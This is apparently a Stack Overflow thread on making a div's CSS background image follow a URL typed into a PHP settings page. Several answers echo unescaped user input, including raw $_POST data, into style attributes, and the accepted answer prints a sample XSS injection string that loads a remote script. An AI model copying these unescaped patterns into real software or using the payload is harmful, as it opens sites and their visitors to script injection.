# How to have dynamic image as CSS background?

Tags: php, css, background

I have a logo div that I want to use my logo image as the background for, such as:

```
.logo {
    background: #FFF url(images/logo.jpg);
}
```

However, on a settings page in my script, I would like to have a text input field to specify what the image URL is for the background image.

How can I set the background image for this div as the inputted image URL without having to do:

```
<div><img src="/images/logo.jpg" /></div>
```

(The script is written in PHP)

Comment: Does it have to be persistent? Can it be done with javascript/jquery or does it have to be done with php?

Comment: I would prefer not to use javascript

Answer (score 34, accepted):

Here are two options to dynamically set a background image.

1. Put an embedded stylesheet in the document's `<head>`:

   ```
   <style type="text/css">
   .logo {
      background: #FFF url(<?php echo $variable_holding_img_url; ?>);
   }
   </style>
   ```
2. Define the `background-image` CSS property inline:

   ```
   <div style="background-image: url(<?php echo $varable_holding_img_url; ?>);">...</div>
   ```

**Note:** Make sure to sanitize your input, before saving it to the database (see [Bobby Tables](http://bobby-tables.com)). Make sure it *does not contain HTML or anything else, only valid URL characters*, escape quotes, etc. If this isn't done, an attacker could inject code into the page:

```
"> <script src="http://example.com/xss-attack.js"></script> <!--
```

Comment: But isn't it best to use CSS files for cache and site speed? I thought inline styles were bad.

Comment: @JordanCarter Yes, CSS files are best for caching and site speed. But you probably wouldn't really want this part cached, as the background URL is a variable and thus can/will change. In this case I think embedded styles is fine, so long as the entire stylesheet isn't embedded in the webpage.

Answer (score 6):

```
<input type="text" class="inputContent" />
<script type="text/javascript">
    var inputC = $('input.inputContent').val();
    $('body').css('background', 'url(' + inputC + ')');
</script>
```

That's entirely js and jQuery, because I don't know PHP, but it's a solution!

Answer (score 3):

You either need to generate the css from a PHP script (somewhat advanced), or use inline styles to do the trick.  Ex:

```
<div style="background-image: <?php echo $_POST['whateverjpg']; ?>" >
//blah
</div>
```

This is incredibly insecure, but the most concise answer I can give..

Comment: PHP injection.  Just escape your data.

Comment: Oh, yeah... anyone that doesn't escape their user-inputted data (and database inputs, which is most likely what the URL to this image will be stored in) should educate themselves about [Bobby Tables](http://bobby-tables.com/).

Answer (score 2):

I think you can set the background image dynamically using javascript as given [here](http://www.w3schools.com/jsref/prop_style_backgroundimage.asp).

```
document.getElementById("xyz").style.backgroundImage="your path";
```

If you prefer not to use javascript, why can't you use inline `style` attribute.
ex

```
<div style="background-image: url(xyz)"></div>
```